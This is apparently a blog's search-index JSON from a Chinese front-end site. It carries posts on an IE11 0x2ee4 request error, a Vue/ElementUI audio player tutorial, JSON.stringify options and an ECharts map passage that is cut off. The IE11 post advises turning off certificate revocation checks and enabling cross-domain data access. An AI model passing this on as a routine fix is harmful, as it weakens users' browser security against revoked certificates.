如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","permalink":"https://wdd.js.org/posts/2018/02/ie11-0x2ee4-bug/","summary":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就将一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POTST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发型商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","title":"IE11 0x2ee4 bug 以及类似问题解决方法"},{"content":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ? Author wangdd \u0026lt;wangdd@xxxxxx.com\u0026gt; ? Vue build standalone ? Install vue-router? No ? Use ESLint to lint your code? No ? Set up unit tests No ? Setup e2e tests with Nightwatch? No ? Should we run `npm install` for you after the project has been created? (recommended) npm ➜ test cd element-audio ➜ element-audio npm run dev 浏览器打开 http://localhost:8080/, 看到如下界面,说明项目初始化成功\n5.1. 安装ElementUI并插入audio标签 5.1.1. 安装ElementUI yarn add element-ui // or npm i element-ui -S 5.1.2. 在src/main.js中引入Element UI // filename: src/main.js import Vue from \u0026#39;vue\u0026#39; import ElementUI from \u0026#39;element-ui\u0026#39; import App from \u0026#39;./App\u0026#39; import \u0026#39;element-ui/lib/theme-chalk/index.css\u0026#39; Vue.config.productionTip = false Vue.use(ElementUI) /* eslint-disable no-new */ new Vue({ el: \u0026#39;#app\u0026#39;, template: \u0026#39;\u0026lt;App/\u0026gt;\u0026#39;, components: { App } }) 5.1.3. 创建src/components/VueAudio.vue // filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;audio src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.1.4. 修改src/App.vue, 并引入VueAudio.vue组件 // filename: src/App.vue \u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;VueAudio /\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开:http://localhost:8080/,你应该能看到如下效果,说明引入成功,你可以点击播放按钮看看,音频是否能够播放 5.2. 音频的播放暂停控制 我们需要用一个按钮去控制音频的播放与暂停,这里调用了audio的两个api,以及两个事件\naudio.play() audio.pause() play事件 pause事件 修改src/components/VueAudio.vue\n// filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.3. 音频显示时间 音频的时间显示主要有两部分,音频的总时长和当前播放时间。可以从两个事件中获取\nloadedmetadata:代表音频的元数据已经被加载完成,可以从中获取音频总时长 timeupdate: 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变,可以从该事件中获取音频的当前播放时间,该事件在播放过程中会不断被触发 要点代码:整数格式化成时:分:秒\nfunction realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } 要点代码: 两个事件的处理\n// 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } 完整代码\n\u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; // 将整数转换成 时:分:秒的格式 function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false, // 音频当前播放时长 currentTime: 0, // 音频最大播放时长 maxTime: 0 } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, // 将整数转化成时分秒 formatSecond(second = 0) { return realFormatSecond(second) } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开浏览器可以看到,当音频播放时,当前时间也在改变。 5.4. 音频进度条控制 进度条主要有两个控制,改变进度的原理是:改变audio.currentTime属性值\n音频播放后,当前时间改变,进度条就要随之改变 拖动进度条,可以改变音频的当前时间 // 进度条ui \u0026lt;el-slider v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; // 拖动进度条,改变当前时间,index是进度条改变时的回调函数的参数0-100之间,需要换算成实际时间 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, // 当音频当前时间改变后,进度条也要改变 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 进度条格式化toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, 5.5. 音频音量控制 音频的音量控制和进度控制差不多,也是通过拖动滑动条,去修改aduio.volume属性值,此处不再啰嗦\n5.6. 音频播放速度控制 音频播放速度控制和进度控制差不多,也是点击按钮,去修改aduio.playbackRate属性值,该属性代表音量的大小,取值范围是0 - 1,用滑动条的时候,也是需要换算一下值,此处不再啰嗦\n5.7. 音频静音控制 静音的控制是点击按钮,去修改aduio.muted属性,该属性有两个值: true(静音),false(不静音)。 注意,静音的时候,音频的进度条还是会继续往前走的。\n5.8. 音频下载控制 音频下载是一个a链接,记得加上download属性,不然浏览器会在新标签打开音频,而不是下载音频\n\u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; 5.9. 个性化配置 音频的个性化配置有很多,大家可以自己扩展,通过父组件传递响应的值,可以做到个性化设置。\ncontrolList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, 例如父组件这样\n\u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;div v-for=\u0026#34;item in audios\u0026#34; :key=\u0026#34;item.url\u0026#34;\u0026gt; \u0026lt;VueAudio :theUrl=\u0026#34;item.url\u0026#34; :theControlList=\u0026#34;item.controlList\u0026#34;/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return { audios: [ { url: \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, controlList: \u0026#39;onlyOnePlaying\u0026#39; }, { url: \u0026#39;http://devtest.qiniudn.com/回レ!雪月花.mp3\u0026#39;, controlList: \u0026#39;noDownload noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/あっちゅ~ま青春!.mp3\u0026#39;, controlList: \u0026#39;noDownload noVolume noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/Preparation.mp3\u0026#39;, controlList: \u0026#39;noDownload noSpeed onlyOnePlaying\u0026#39; } ] } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.10. 一点点ES6语法 大多数时候,我们希望页面上播放一个音频时,其他音频可以暂停。 [...audios]可以把一个类数组转化成数组,这个是我常用的。\nonPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); // 如果设置了排他性,当前音频播放是,其他音频都要暂停 [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, 5.11. 完成后的文件 //filename: VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div class=\u0026#34;di main-wrap\u0026#34; v-loading=\u0026#34;audio.waiting\u0026#34;\u0026gt; \u0026lt;!-- 这里设置了ref属性后,在vue组件中,就可以用this.$refs.audio来访问该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; class=\u0026#34;dn\u0026#34; :src=\u0026#34;url\u0026#34; :preload=\u0026#34;audio.preload\u0026#34; @play=\u0026#34;onPlay\u0026#34; @error=\u0026#34;onError\u0026#34; @waiting=\u0026#34;onWaiting\u0026#34; @pause=\u0026#34;onPause\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; \u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noSpeed\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;changeSpeed\u0026#34;\u0026gt;{{audio.speed | transSpeed}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noProcess\u0026#34; v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond }}\u0026lt;/el-tag\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noMuted\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;startMutedOrNot\u0026#34;\u0026gt;{{audio.muted | transMutedOrNot}}\u0026lt;/el-button\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noVolume\u0026#34; v-model=\u0026#34;volume\u0026#34; :format-tooltip=\u0026#34;formatVolumeToolTip\u0026#34; @change=\u0026#34;changeVolume\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { props: { theUrl: { type: String, required: true, }, theSpeeds: { type: Array, default () { return [1, 1.5, 2] } }, theControlList: { type: String, default: \u0026#39;\u0026#39; } }, name: \u0026#39;VueAudio\u0026#39;, data() { return { url: this.theUrl || \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, audio: { currentTime: 0, maxTime: 0, playing: false, muted: false, speed: 1, waiting: true, preload: \u0026#39;auto\u0026#39; }, sliderTime: 0, volume: 100, speeds: this.theSpeeds, controlList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } } }, methods: { setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, changeSpeed() { let index = this.speeds.indexOf(this.audio.speed) + 1 this.audio.speed = this.speeds[index % this.speeds.length] this.$refs.audio.playbackRate = this.audio.speed }, startMutedOrNot() { this.$refs.audio.muted = !this.$refs.audio.muted this.audio.muted = this.$refs.audio.muted }, // 音量条toolTip formatVolumeToolTip(index) { return \u0026#39;音量条: \u0026#39; + index }, // 进度条toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, // 音量改变 changeVolume(index = 0) { this.$refs.audio.volume = index / 100 this.volume = index }, // 播放跳转 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, startPlayOrPause() { return this.audio.playing ? this.pausePlay() : this.startPlay() }, // 开始播放 startPlay() { this.$refs.audio.play() }, // 暂停 pausePlay() { this.$refs.audio.pause() }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当发生错误, 就出现loading状态 onError () { this.audio.waiting = true }, // 当音频开始等待 onWaiting (res) { console.log(res) }, // 当音频开始播放 onPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { // console.log(\u0026#39;timeupdate\u0026#39;) // console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.waiting = false this.audio.maxTime = parseInt(res.target.duration) } }, filters: { formatSecond(second = 0) { return realFormatSecond(second) }, transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, transMutedOrNot(value) { return value ? \u0026#39;放音\u0026#39; : \u0026#39;静音\u0026#39; }, transSpeed(value) { return \u0026#39;快进: x\u0026#39; + value } }, created() { this.setControlList() } } \u0026lt;/script\u0026gt; \u0026lt;!-- Add \u0026#34;scoped\u0026#34; attribute to limit CSS to this component only --\u0026gt; \u0026lt;style scoped\u0026gt; .main-wrap{ padding: 10px 15px; } .slider { display: inline-block; width: 100px; position: relative; top: 14px; margin-left: 15px; } .di { display: inline-block; } .download { color: #409EFF; margin-left: 15px; } .dn{ display: none; } \u0026lt;/style\u0026gt; 6. 感谢 如果你需要一个小型的vue音乐播放器,你可以试试vue-aplayer, 该播放器不仅仅支持vue组件,非Vue的也支持,你可以看看他们的demo\n","permalink":"https://wdd.js.org/posts/2018/02/vue-elementui-audio-component/","summary":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ?","title":"Vue+ElementUI 手把手教你做一个audio组件"},{"content":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return undefined; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能3: 通过数组过滤某些属性 只需要name属性和addr属性,其他不要。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, [\u0026#39;name\u0026#39;, \u0026#39;addr\u0026#39;]); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2.2. space space可以是数字或者是字符串, 如果是数字则表示属性名前加上空格符号的数量,如果是字符串,则直接在属性名前加上该字符串。\n功能1: 给输出属性前加上n个空格\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, 4); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能2: tab格式化输出\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, \u0026#39;\\t\u0026#39;); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能3: 搞笑\nJSON.stringify(user, null, \u0026#39;good\u0026#39;); \u0026#34;{ good\u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, good\u0026#34;isDead\u0026#34;: false, good\u0026#34;age\u0026#34;: 11, good\u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 2.3. 深拷贝 var user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; var temp = JSON.stringify(user); var user2 = JSON.parse(temp); 3. 其他 JSON.parse() 其实也是支持第二个参数的。功能类似于JSON.stringify的第二个参数的功能。\n4. 参考 MDN JSON.stringify() ","permalink":"https://wdd.js.org/posts/2018/02/json-stringify-powerful/","summary":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.","title":"你不知道的JSON.stringify()妙用"},{"content":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我改变了一个方法。这个方法的核心思路是定时获取图标的配置,然后更新配置,最后在设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.5)\u0026#39;, color: \u0026#39;#000000\u0026#39;, 